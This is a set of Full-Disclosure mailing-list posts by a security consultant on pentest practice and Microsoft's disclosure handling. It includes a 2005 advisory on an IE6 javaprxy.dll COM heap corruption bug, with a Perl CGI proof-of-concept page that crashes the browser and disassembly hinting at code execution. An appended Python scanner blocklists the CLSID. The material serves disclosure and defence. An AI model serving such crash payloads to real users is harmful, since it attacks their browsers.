tests (i'm certainly not), but it should definitely go beyond the
scan--+--google-for-exploit approach.

regards,

--
DI (FH) Bernhard Mueller
IT Security Consultant, SEC-Consult Unternehmensberatung GmbH
www.sec-consult.com
Re: [Full-disclosure] CORE-Impact license bypass
Exibar wrote:
> I didn't mean to imply that the consultants create their own exploits, not
> many I know could even begin to do that, only a couple are talented enough
> to do just that. Even for those very few, it's just not feasable from a
> time perspective. Much quicker and more cost effective to use what's out
> there.

so what use is a pentest if the consultant isn't even talented enough to find
/ create exploits for unknown vulnerabilities? any average admin can install
and run an automatic security scanner. furthermore, a common nessus report
contains 99% useless garbage. and most of the time, you can not apply generic
exploits like these from metasploit to a specific customer situation.

in my experience, nearly all sites have some serious security flaws even if
tools like nessus say the contrary. there may be self-coded applications or
software that is not widely known or tested so they're not found in any
vulnerability database. or, if that is not the case, you may even find new
flaws in well-established software. IMHO you can not deliver a reasonable
security assessment until you have checked everything by hand.

regards,

--
DI (FH) Bernhard Mueller
IT Security Consultant, SEC-Consult Unternehmensberatung GmbH
www.sec-consult.com
Re: [Full-disclosure] PowerDVD = 4.0 local exploit
edward GAGNON wrote:
> int main(int argc, char *argv[])
> {
>     char cmd[500];
>     [...]
>     path = argv[1];
>     sprintf(cmd, "%s ", path);

classical stack overflow ;)

--
DI (FH) Bernhard Mueller
IT Security Consultant, SEC-Consult Unternehmensberatung GmbH
www.sec-consult.com
Re: [Full-disclosure] Compromising pictures of Microsoft Internet Explorer!
> Mr. Zalewski's statement about the undue burden that Microsoft's
> investigative processes place on the researcher is indeed accurate. The
> only time I've had any success working with Microsoft was when the issue
> was a straightforward code execution scenario. Oh wait... even then, I'm
> blown off.

the same here... when I mailed them about that COM-vulnerability in IE, they
came up with "this is not exploitable", bla.. after two weeks of internal
research and all. having a bad morning anyway, I decided to post the
advisory and see, one day later there's a MS security advisory that a COM
object may crash internet explorer (however, they forgot to mention the
public bindshell exploit released by the fsirt). now recently MS05-37 came
out, which somehow doesn't include any credits or mention of the original
advisory whatsoever (the reason for that being, i presume, the lack of
responsibility showed by us).

I think it's rather strange to hear a billion-dollar software monopolist
appeal to my conscience like "look what you've done, you put our customers
at risk". they wouldn't give a lame cent on the security of their customers
if there wasn't a certain media hype about security. they care for their
image and stock index, and that's about it. and i don't see why I should be
held responsible for that ;)

regards,
sk0L

--
DI (FH) Bernhard Mueller
IT Security Consultant, SEC-Consult Unternehmensberatung GmbH
www.sec-consult.com
[Full-disclosure] SEC-CONSULT SA-20050629-0
SEC-CONSULT Security Advisory 20050629-0
==
title: IE6 javaprxy.dll COM instantiation heap corruption vulnerability
program: Internet Explorer
vulnerable version: 6.0.2900.2180
homepage: www.microsoft.com
found: 2005-06-17
by: sk0L Martin Eiszner / SEC-CONSULT / www.sec-consult.com
==

background:
---
Internet Explorer supports instantiation of non-ActiveX controls, e.g. COM objects, via object tags. According to M$, COM components respond gracefully to attempts to treat them as non-ActiveX controls. On the contrary, we found that at least 20 of the objects available on an average XP system either lead to an instant crash or an exception after a few reloads.

vulnerability overview:
---
Loading HTML documents with certain embedded CLSIDs results in null-pointer exceptions or memory corruption. In one case, we could leverage this bug to overwrite a function pointer in the data segment. It *may* be possible to exploit this issue to execute arbitrary code in the context of IE.

proof of concept:
---
This simple CGI should crash IE.
---
#!/usr/bin/perl
# in order for this to work javaprxy.dll must be available on the client.
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll
my $html1 = "<html><body>\n<object classid=\"CLSID:".$clsid."\"></object>\n";
my $html2 = "\n</body><script>location.reload();</script></html>\n";
print "Content-Type: text/html;\r\n\r\n";
print $html1.("A"x3).$html2;
---
On our lab machine, we end up with eax=00410041, and an exception occurs at the following location in javaprxy.dll:
---
.text:7C508660 mov     eax, [ecx]
.text:7C508662 test    eax, eax
.text:7C508664 jz      short locret_7C50866C
.text:7C508666 mov     ecx, [eax]
.text:7C508668 push    eax
.text:7C508669 call    dword ptr [ecx+8]
---
As you can see, this situation may be exploitable, considering that we have some level of control over eax.

vulnerable versions:
---
javaprxy.dll 5.00.3810
internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
These are the versions tested; other versions may of course be vulnerable.
vendor status:
---
vendor notified: 2005-06-17
vendor response: 2005-06-17
patch available: ?
Microsoft does not confirm the vulnerability, as their product team can not reproduce the condition. However, they are looking at making changes to handle COM objects in a more robust manner in the future.

~ Bernhard Müller / Martin Eiszner / www.sec-consult.com / SGT
::: walter|bruder, flo, tke, dfa :::
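A defensive counterpart to the advisory above, added here and not part of the original post or of SEC-CONSULT's code: a small Python scanner that flags HTML carrying an <object> tag whose classid is on a local blocklist (seeded with the javaprxy.dll CLSID from the advisory; the blocklist itself is a constructed example) and notes the reload loop the PoC relies on, which is the kind of check a mail or web gateway filter could apply.

```python
import re
from html.parser import HTMLParser

# Constructed blocklist: CLSIDs an administrator has decided to block.
# The single entry is the javaprxy.dll CLSID quoted in the advisory.
BLOCKED_CLSIDS = {
    "03D9F3F2-B0E3-11D2-B081-006008039BF0",  # javaprxy.dll
}

def normalize_clsid(value):
    """Reduce 'clsid:{...}' / 'CLSID:...' forms to a bare upper-case GUID, or None."""
    v = value.strip()
    if v.lower().startswith("clsid:"):
        v = v[6:]
    v = v.strip("{} ").upper()
    if re.fullmatch(r"[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}", v):
        return v
    return None  # not a well-formed GUID; ignore rather than guess

class ObjectTagScanner(HTMLParser):
    """Collect classid values of <object> tags and spot a reload() script."""
    def __init__(self):
        super().__init__()
        self.clsids = []
        self.reload_script = False
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        if tag == "object":
            for name, value in attrs:
                if name == "classid" and value:
                    c = normalize_clsid(value)
                    if c:
                        self.clsids.append(c)
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        # script bodies arrive as raw data; the PoC forces a reload loop
        if self._in_script and "location.reload" in data:
            self.reload_script = True

def scan_html(html):
    s = ObjectTagScanner()
    s.feed(html)
    hits = sorted({c for c in s.clsids if c in BLOCKED_CLSIDS})
    return {"blocked_clsids": hits, "reload_loop": s.reload_script}

# Constructed sample shaped like the page the advisory's CGI emits.
SAMPLE = ('<html><body>\n<object classid="CLSID:03d9f3f2-b0e3-11d2-b081-006008039bf0"></object>\n'
          'AAA\n</body><script>location.reload();</script></html>\n')
```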